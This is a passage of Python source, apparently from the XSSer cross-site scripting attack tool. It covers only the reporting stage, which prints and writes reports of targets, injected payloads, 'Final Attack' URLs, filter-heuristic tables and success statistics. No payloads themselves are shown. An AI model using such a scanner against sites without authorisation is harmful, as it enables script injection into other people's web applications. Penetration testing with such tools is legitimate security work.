  3141.                             fout.write("="*75 + "\n\n")
    3142. 

  3142.             elif line[1] == "[manual_injection]":
    3143. 

  3143.                 self.manual_found = self.manual_found + 1
    3144. 

  3144.                 if len(self.hash_found) < 11:
    3145. 

  3145.                     if line[4]: # when query string
    3146. 

  3146.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3147. 

  3147.                     else:
    3148. 

  3148.                         self.report("[+] Target:", line[6])
    3149. 

  3149.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3150. 

  3150.                     self.report("[!] Method: MANUAL")
    3151. 

  3151.                     self.report("[*] Hash:", line[3])
    3152. 

  3152.                     self.report("[*] Payload:", line[0])
    3153. 

  3153.                     if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3154. 

  3154.                         self.report("[*] Final Attack:", attack_url)
    3155. 

  3155.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3156. 

  3156.                 if self.options.fileoutput:
    3157. 

  3157.                     fout.write("="*75)
    3158. 

  3158.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3159. 

  3159.                     fout.write("="*75 + "\n\n")
    3160. 

  3160.                     for line in self.hash_found:
    3161. 

  3161.                         if line[4]:
    3162. 

  3162.                             if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3163. 

  3163.                                 fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3164. 

  3164.                             else:
    3165. 

  3165.                                 fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3166. 

  3166.                         else:
    3167. 

  3167.                             if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3168. 

  3168.                                 fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3169. 

  3169.                             else:
    3170. 

  3170.                                 fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3171. 

  3171.                         fout.write("="*75 + "\n\n")
    3172. 

  3172.             elif line[1] == "[Heuristic test]":
    3173. 

  3173.                 if len(self.hash_found) < 11:
    3174. 

  3174.                     if line[4]: 
    3175. 

  3175.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3176. 

  3176.                     else:
    3177. 

  3177.                         self.report("[+] Target:", line[6])
    3178. 

  3178.                     self.report("[+] Vector: [ " + str(line[3]) + " ]")
    3179. 

  3179.                     self.report("[!] Method:", line[2])
    3180. 

  3180.                     self.report("[*] Payload:", line[5])
    3181. 

  3181.                     self.report("[!] Status: NOT FILTERED!",  "\n", '-'*50, "\n")
    3182. 

  3182.                 if self.options.fileoutput:
    3183. 

  3183.                     fout.write("="*75)
    3184. 

  3184.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3185. 

  3185.                     fout.write("="*75 + "\n\n")
    3186. 

  3186.                     for line in self.hash_found:
    3187. 

  3187.                         if line[4]:
    3188. 

  3188.                             fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
    3189. 

  3189.                         else:
    3190. 

  3190.                             fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
    3191. 

  3191.                         fout.write("="*75 + "\n\n")
    3192. 

  3192.             else:
    3193. 

  3193.                 self.auto_found = self.auto_found + 1
    3194. 

  3194.                 if len(self.hash_found) < 11:
    3195. 

  3195.                     if line[4]: # when query string
    3196. 

  3196.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3197. 

  3197.                     else:
    3198. 

  3198.                         self.report("[+] Target:", line[6])
    3199. 

  3199.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3200. 

  3200.                     self.report("[!] Method: URL")
    3201. 

  3201.                     self.report("[*] Hash:", line[3])
    3202. 

  3202.                     self.report("[*] Payload:", line[0])
    3203. 

  3203.                     self.report("[!] Vulnerable:", line[1])
    3204. 

  3204.                     if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3205. 

  3205.                         self.report("[*] Final Attack:", attack_url)
    3206. 

  3206.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3207. 

  3207.                 if self.options.fileoutput:
    3208. 

  3208.                     fout.write("="*75)
    3209. 

  3209.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3210. 

  3210.                     fout.write("="*75 + "\n\n")
    3211. 

  3211.                     for line in self.hash_found:
    3212. 

  3212.                         if line[4]:
    3213. 

  3213.                             if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3214. 

  3214.                                 fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3215. 

  3215.                             else:
    3216. 

  3216.                                 fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
    3217. 

  3217.                         else:
    3218. 

  3218.                             if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3219. 

  3219.                                 fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3220. 

  3220.                             else:
    3221. 

  3221.                                 fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
    3222. 

  3222.                         fout.write("="*75 + "\n\n")
    3223. 

  3223. 

  3224.         if self.options.fileoutput:
    3225. 

  3225.             fout.close()
    3226. 

  3226.         if self.options.fileoutput and not self.options.filexml:
    3227. 

  3227.            self.report("[Info] Generating report: [ XSSreport.raw ]\n")
    3228. 

  3228.            self.report("-"*25+"\n")
    3229. 

  3229.         if self.options.fileoutput and self.options.filexml:
    3230. 

  3230.            self.report("[Info] Generating report: [ XSSreport.raw ] | Exporting results to: [ " + str(self.options.filexml) + " ] \n")
    3231. 

  3231.            self.report("-"*25+"\n")
    3232. 

  3232.         if len(self.hash_found) > 10 and not self.options.fileoutput: # write results fo file when large output (white magic!)
    3233. 

  3233.             if not self.options.filexml: 
    3234. 

  3234.                 self.report("[Info] Aborting large screen output. Generating report: [ XSSreport.raw ]\n")
    3235. 

  3235.                 self.report("-"*25+"\n")
    3236. 

  3236.                 fout = open("XSSreport.raw", "w") # write better than append
    3237. 

  3237.                 fout.write("="*75)
    3238. 

  3238.                 fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3239. 

  3239.                 fout.write("="*75 + "\n\n")
    3240. 

  3240.                 for line in self.hash_found:
    3241. 

  3241.                     if line[4]:
    3242. 

  3242.                         if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3243. 

  3243.                             fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3244. 

  3244.                         else:
    3245. 

  3245.                             fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
    3246. 

  3246.                     else:
    3247. 

  3247.                         if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3248. 

  3248.                             fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3249. 

  3249.                         else:
    3250. 

  3250.                             fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
    3251. 

  3251.                     fout.write("="*75 + "\n\n")
    3252. 

  3252.                 fout.close()
    3253. 

  3253.             else:
    3254. 

  3254.                 self.report("[Info] Exporting results to: [ " + str(self.options.filexml) + " ]\n")
    3255. 

  3255.                 self.report("-"*25+"\n")
    3256. 

  3256.         # heuristic always with statistics
    3257. 

  3257.         if self.options.heuristic:
    3258. 

  3258.             heuris_semicolon_total_found = self.heuris_semicolon_found + self.heuris_une_semicolon_found + self.heuris_dec_semicolon_found
    3259. 

  3259.             heuris_backslash_total_found = self.heuris_backslash_found + self.heuris_une_backslash_found + self.heuris_dec_backslash_found
    3260. 

  3260.             heuris_slash_total_found = self.heuris_slash_found + self.heuris_une_slash_found + self.heuris_dec_slash_found
    3261. 

  3261.             heuris_minor_total_found = self.heuris_minor_found + self.heuris_une_minor_found + self.heuris_dec_minor_found
    3262. 

  3262.             heuris_mayor_total_found = self.heuris_mayor_found + self.heuris_une_mayor_found + self.heuris_dec_mayor_found
    3263. 

  3263.             heuris_doublecolon_total_found = self.heuris_doublecolon_found + self.heuris_une_doublecolon_found + self.heuris_dec_doublecolon_found
    3264. 

  3264.             heuris_colon_total_found = self.heuris_colon_found + self.heuris_une_colon_found + self.heuris_dec_colon_found
    3265. 

  3265.             heuris_equal_total_found = self.heuris_equal_found + self.heuris_une_equal_found + self.heuris_dec_equal_found
    3266. 

  3266.             total_heuris_found = heuris_semicolon_total_found + heuris_backslash_total_found + heuris_slash_total_found + heuris_minor_total_found + heuris_mayor_total_found + heuris_doublecolon_total_found + heuris_colon_total_found + heuris_equal_total_found
    3267. 

  3267.             total_heuris_params = total_heuris_found + self.heuris_semicolon_found + self.heuris_backslash_found + self.heuris_slash_found + self.heuris_minor_found + self.heuris_mayor_found + self.heuris_doublecolon_found + self.heuris_colon_found + self.heuris_equal_found
    3268. 

  3268.             total_heuris_notfound = self.heuris_semicolon_notfound + self.heuris_backslash_notfound + self.heuris_slash_notfound + self.heuris_minor_notfound + self.heuris_mayor_notfound + self.heuris_doublecolon_notfound + self.heuris_colon_notfound + self.heuris_equal_notfound
    3269. 

  3269.             if total_heuris_notfound > 0: # not shown when not found
    3270. 

  3270.                 self.options.statistics = True
    3271. 

  3271. 	    # some statistics reports
    3272. 

  3272.         if self.options.statistics:
    3273. 

  3273.             # heuristic test results
    3274. 

  3274.             if self.options.heuristic:
    3275. 

  3275.                 self.report("\n"+'='*75)
    3276. 

  3276.                 self.report("[+] Heuristics:")
    3277. 

  3277.                 self.report('='*75)
    3278. 

  3278.                 test_time = datetime.datetime.now() - self.time
    3279. 

  3279.                 self.report("\n" + '-'*50)
    3280. 

  3280.                 self.report("Test Time Duration: ", test_time)
    3281. 

  3281.                 self.report('-'*50  )
    3282. 

  3282.                 total_connections = total_heuris_found + total_heuris_notfound
    3283. 

  3283.                 self.report("Total fuzzed:", total_connections)
    3284. 

  3284.                 self.report('-'*75)
    3285. 

  3285.                 self.report('  ', "  <FILTERED!>", "  <NOT FILTERED!>", " =" , "  ASCII", "+", "UNE/HEX", "+", "DEC")
    3286. 

  3286.                 # semicolon results
    3287. 

  3287.                 self.report('; ',   "      ", self.heuris_semicolon_notfound, "             ", 
    3288. 

  3288.                             heuris_semicolon_total_found, "             ",
    3289. 

  3289.                             self.heuris_semicolon_found, "      ",
    3290. 

  3290.                             self.heuris_une_semicolon_found, "     ",
    3291. 

  3291.                             self.heuris_dec_semicolon_found)
    3292. 

  3292.                 # backslash results
    3293. 

  3293.                 self.report('\\ ',  "      ", self.heuris_backslash_notfound, "             ", 
    3294. 

  3294.                             heuris_backslash_total_found, "             ",
    3295. 

  3295.                             self.heuris_backslash_found, "      ",
    3296. 

  3296.                             self.heuris_une_backslash_found, "     ",
    3297. 

  3297.                             self.heuris_dec_backslash_found)
    3298. 

  3298.                 # slash results
    3299. 

  3299.                 self.report("/ ",   "      ", self.heuris_slash_notfound, "             ",
    3300. 

  3300.                             heuris_slash_total_found, "             ",
    3301. 

  3301.                             self.heuris_slash_found, "      ",
    3302. 

  3302.                             self.heuris_une_slash_found, "     ",
    3303. 

  3303.                             self.heuris_dec_slash_found)
    3304. 

  3304.                 # minor results
    3305. 

  3305.                 self.report("< ",   "      ", self.heuris_minor_notfound, "             ",
    3306. 

  3306.                             heuris_minor_total_found, "             ",
    3307. 

  3307.                             self.heuris_minor_found, "      ",
    3308. 

  3308.                             self.heuris_une_minor_found, "     ",
    3309. 

  3309.                             self.heuris_dec_minor_found)
    3310. 

  3310.                 # mayor results
    3311. 

  3311.                 self.report("> ",   "      ", self.heuris_mayor_notfound, "             ",
    3312. 

  3312.                             heuris_mayor_total_found, "             ",
    3313. 

  3313.                             self.heuris_mayor_found, "      ",
    3314. 

  3314.                             self.heuris_une_mayor_found, "     ",
    3315. 

  3315.                             self.heuris_dec_mayor_found)
    3316. 

  3316.                 # doublecolon results
    3317. 

  3317.                 self.report('" ',   "      ", self.heuris_doublecolon_notfound, "             ", 
    3318. 

  3318.                             heuris_doublecolon_total_found, "             ",
    3319. 

  3319.                             self.heuris_doublecolon_found, "      ",
    3320. 

  3320.                             self.heuris_une_doublecolon_found, "     ",
    3321. 

  3321.                             self.heuris_dec_doublecolon_found)
    3322. 

  3322.                 # colon results
    3323. 

  3323.                 self.report("' ",   "      ", self.heuris_colon_notfound, "             ",
    3324. 

  3324.                             heuris_colon_total_found, "             ",
    3325. 

  3325.                             self.heuris_colon_found, "      ",
    3326. 

  3326.                             self.heuris_une_colon_found, "     ",
    3327. 

  3327.                             self.heuris_dec_colon_found)
    3328. 

  3328.                 # equal results
    3329. 

  3329.                 self.report("= ",   "      ", self.heuris_equal_notfound, "             ",
    3330. 

  3330.                             heuris_equal_total_found, "             ",
    3331. 

  3331.                             self.heuris_equal_found, "      ",
    3332. 

  3332.                             self.heuris_une_equal_found, "     ",
    3333. 

  3333.                             self.heuris_dec_equal_found)
    3334. 

  3334.                 self.report('-'*75)
    3335. 

  3335.                 try:
    3336. 

  3336.                     _accur = total_heuris_found * 100 / total_heuris_params
    3337. 

  3337.                 except ZeroDivisionError:
    3338. 

  3338.                     _accur = 0
    3339. 

  3339.                 self.report('Target(s) Filtering Accur: %s %%' % _accur)
    3340. 

  3340.                 self.report('-'*75)
    3341. 

  3341.             # statistics block
    3342. 

  3342.             if len(self.hash_found) + len(self.hash_notfound) == 0:
    3343. 

  3343.                 pass
    3344. 

  3344.             if self.options.heuristic:
    3345. 

  3345.                 pass
    3346. 

  3346.             else:
    3347. 

  3347.                 self.report('='*75)
    3348. 

  3348.                 self.report("[+] Statistics:")
    3349. 

  3349.                 self.report('='*75)
    3350. 

  3350.                 test_time = datetime.datetime.now() - self.time
    3351. 

  3351.                 self.report("\n" + '-'*50)
    3352. 

  3352.                 self.report("Test Time Duration: ", test_time)
    3353. 

  3353.                 self.report('-'*50  )
    3354. 

  3354.                 total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection
    3355. 

  3355.                 self.report("Total Connections:", total_connections)
    3356. 

  3356.                 self.report('-'*25)
    3357. 

  3357.                 self.report("200-OK:" , self.success_connection , "|",  "404:" ,
    3358. 

  3358.                             self.not_connection , "|" , "503:" ,
    3359. 

  3359.                             self.forwarded_connection , "|" , "Others:",
    3360. 

  3360.                             self.other_connection)
    3361. 

  3361.                 try:
    3362. 

  3362.                     _accur = self.success_connection * 100 / total_connections
    3363. 

  3363.                 except ZeroDivisionError:
    3364. 

  3364.                     _accur = 0
    3365. 

  3365.                 self.report("Connec: %s %%" % _accur)
    3366. 

  3366.                 self.report('-'*50)
    3367. 

  3367.                 total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection 
    3368. 

  3368.                 self.report("Total Payloads:", total_payloads)
    3369. 

  3369.                 self.report('-'*25)
    3370. 

  3370.                 self.report("Checker:", self.check_positives,  "|", "Manual:",
    3371. 

  3371.                             self.manual_injection, "|" , "Auto:" ,
    3372. 

  3372.                             self.auto_injection ,"|", "DCP:",
    3373. 

  3373.                             self.dcp_injection, "|", "DOM:", self.dom_injection,
    3374. 

  3374.                             "|", "Induced:", self.httpsr_injection, "|" , "XSR:",
    3375. 

  3375.                             self.xsr_injection, "|", "XSA:",
    3376. 

  3376.                             self.xsa_injection , "|", "COO:",
    3377. 

  3377.                             self.coo_injection)
    3378. 

  3378.                 self.report('-'*50)
    3379. 

  3379.                 self.report("Total Injections:" , 
    3380. 

  3380.                             len(self.hash_notfound) + len(self.hash_found))
    3381. 

  3381.                 self.report('-'*25)
    3382. 

  3382.                 self.report("Failed:" , len(self.hash_notfound), "|",
    3383. 

  3383.                             "Successful:" , len(self.hash_found))
    3384. 

  3384.                 try:
    3385. 

  3385.                     _accur = len(self.hash_found) * 100 / total_injections
    3386. 

  3386.                 except ZeroDivisionError:
    3387. 

  3387.                     _accur = 0
    3388. 

  3388.                 self.report("Accur : %s %%" % _accur)
    3389. 

  3389.                 self.report("\n" + '='*50)
    3390. 

  3390.                 total_discovered = self.false_positives + self.manual_found + self.auto_found + self.dcp_found + self.dom_found + self.xsr_found + self.xsa_found + self.coo_found
    3391. 

  3391.                 self.report("\n" + '-'*50)
    3392. 

  3392.                 self.report("Total XSS Discovered:", total_discovered)
    3393. 

  3393.                 self.report('-'*50)
    3394. 

  3394.                 self.report("Checker:", self.false_positives, "|",
    3395. 

  3395.                             "Manual:",self.manual_found, "|", "Auto:",
    3396. 

  3396.                             self.auto_found, "|", "DCP:", self.dcp_found,
    3397. 

  3397.                             "|", "DOM:", self.dom_found, "|", "Induced:",
    3398. 

  3398.                             self.httpsr_found, "|" , "XSR:", self.xsr_found,
    3399. 

  3399.                             "|", "XSA:", self.xsa_found, "|", "COO:",
    3400. 

  3400.                             self.coo_found)
    3401. 

  3401.                 self.report('-'*50)
    3402. 

  3402.                 self.report("False positives:", self.false_positives, "|",
    3403. 

  3403.                             "Vulnerables:",
    3404. 

  3404.                             total_discovered - self.false_positives)
    3405. 

  3405.                 self.report('-'*25)
    3406. 

  3406. 	        # efficiency ranking:
    3407. 

  3407. 	        # algor= vulnerables + false positives - failed * extras
    3408. 

  3408.                 mana = 0
    3409. 

  3409.                 h_found = 0
    3410. 

  3410.                 for h in self.hash_found:
    3411. 

  3411.                     h_found = h_found + 1
    3412. 

  3412.                 if h_found > 3:
    3413. 

  3413.                     mana = mana + 4500
    3414. 

  3414.                 if h_found == 1:
    3415. 

  3415.                     mana = mana + 500
    3416. 

  3416.                 if self.options.reversecheck:
    3417. 

  3417.                     mana = mana + 200
    3418. 

  3418.                 if total_payloads > 100:
    3419. 

  3419.                     mana = mana + 150
    3420. 

  3420.                 if not self.options.xsser_gtk:
    3421. 

  3421.                     mana = mana + 25
    3422. 

  3422.                 if self.options.discode:
    3423. 

  3423.                     mana = mana + 100
    3424. 

  3424.                 if self.options.proxy:
    3425. 

  3425.                     mana = mana + 100
    3426. 

  3426.                 if self.options.threads > 9:
    3427. 

  3427.                     mana = mana + 100
    3428. 

  3428.                 if self.options.heuristic:
    3429. 

  3429.                     mana = mana + 100
    3430. 

  3430.                 if self.options.finalpayload or self.options.finalremote:
    3431. 

  3431.                     mana = mana + 100
    3432. 

  3432.                 if self.options.script:
    3433. 

  3433.                     mana = mana + 100
    3434. 

  3434.                 if self.options.Cem or self.options.Doo:
    3435. 

  3435.                     mana = mana + 75
    3436. 

  3436.                 if self.options.heuristic:
    3437. 

  3437.                     mana = mana + 50
    3438. 

  3438.                 if self.options.script and not self.options.fuzz:
    3439. 

  3439.                     mana = mana + 25
    3440. 

  3440.                 if self.options.followred and self.options.fli:
    3441. 

  3441.                     mana = mana + 25
    3442. 

  3442.                 if self.options.wizard:
    3443. 

  3443.                     mana = mana + 25
    3444. 

  3444.                 if self.options.dcp:
    3445. 

  3445.                     mana = mana + 25
    3446. 

  3446.                 if self.options.hash:
    3447. 

  3447.                     mana = mana + 10
    3448. 

  3448.                 mana = (len(self.hash_found) * mana) + mana
    3449. 

  3449.                 # enjoy it :)
    3450. 

  3450.                 self.report("Mana:", mana)
    3451. 

  3451.                 self.report("")
    3452. 

  3452.         c = Curl()
    3453. 

  3453.         if not len(self.hash_found) and self.hash_notfound:
    3454. 

  3454.             if self.options.hash:
    3455. 

  3455.                 if self.options.statistics:
    3456. 

  3456.                     self.report('='*75 + '\n')
    3457. 

  3457.                 self.report("[Info] Target isn't replying to the input [ --hash ] sent!\n")
    3458. 

  3458.             else:
    3459. 

  3459.                 if self.options.target or self.options.heuristic:
    3460. 

  3460.                     self.report("")
    3461. 

  3461.                 if self.options.heuristic:
    3462. 

  3462.                     pass
    3463. 

  3463.                 else:
    3464. 

  3464.                     if self.options.statistics:
    3465. 

  3465.                         self.report('='*75 + '\n')
    3466. 

  3466.             if self.options.fileoutput:
    3467. 

  3467.                 fout = open("XSSreport.raw", "w") # write better than append
    3468. 

  3468.                 fout.write("="*75)
    3469. 

  3469.                 fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3470. 

  3470.                 fout.write("="*75 + "\n\n")
    3471. 

  3471.                 for h in self.hash_notfound:
    3472. 

  3472.                     if h[2] == 'heuristic':
    3473. 

  3473.                         if not h[4]:
    3474. 

  3474.                             fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
    3475. 

  3475.                         else:
    3476. 

  3476.                             fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
    3477. 

  3477.                     elif h[2] == 'hashing check':
    3478. 

  3478.                         if not h[4]:
    3479. 

  3479.                             fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
    3480. 

  3480.                         else:
    3481. 

  3481.                             fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
    3482. 

  3482.                     else:
    3483. 

  3483.                         if h[4]:
    3484. 

  3484.                             if h[2] == "XSA":
    3485. 

  3485.                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3486. 

  3486.                             elif h[2] == "XSR":
    3487. 

  3487.                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3488. 

  3488.                             elif h[2] == "COO":
    3489. 

  3489.                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3490. 

  3490.                             else:
    3491. 

  3491.                                 fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
    3492. 

  3492.                         else:
    3493. 

  3493.                             if h[2] == "XSA":
    3494. 

  3494.                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3495. 

  3495.                             elif h[2] == "XSR":
    3496. 

  3496.                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3497. 

  3497.                             elif h[2] == "COO":
    3498. 

  3498.                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3499. 

  3499.                             else:
    3500. 

  3500.                                 fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
    3501. 

  3501.                     fout.write("="*75 + "\n\n")
    3502. 

  3502.                 fout.close()
    3503. 

  3503.         else:
    3504. 

  3504.             # some exits and info for some bad situations:
    3505. 

  3505.             if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception:
    3506. 

  3506.                 self.report("\n[Error] XSSer cannot send any data... maybe -something- is blocking connection(s)!?\n")
    3507. 

  3507.             if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling:
    3508. 

  3508.                 if self.options.xsser_gtk:
    3509. 

  3509.                     self.report('='*75)
    3510. 

  3510.                 self.report("\n[Error] Not any feedback from crawler... Aborting! :(\n")
    3511. 

  3511.                 self.report('='*75 + '\n')
    3512. 

  3512. 

  3513.         # print results to xml file
    3514. 

  3514.         if self.options.filexml:
    3515. 

  3515.             xml_report_results = xml_reporting(self)
    3516. 

  3516.             try:
    3517. 

  3517.                 xml_report_results.print_xml_results(self.options.filexml)
    3518. 

  3518.             except:
    3519. 

  3519.                 return
    3520. 

  3520. 

  3521. if __name__ == "__main__":
    3522. 

  3522.     app = xsser()
    3523. 

  3523.     options = app.create_options()
    3524. 

  3524.     if options:
    3525. 

  3525.         app.set_options(options)
    3526. 

  3526.         app.run()
    3527. 

  3527.     app.land(True)
    3528. 

  3528.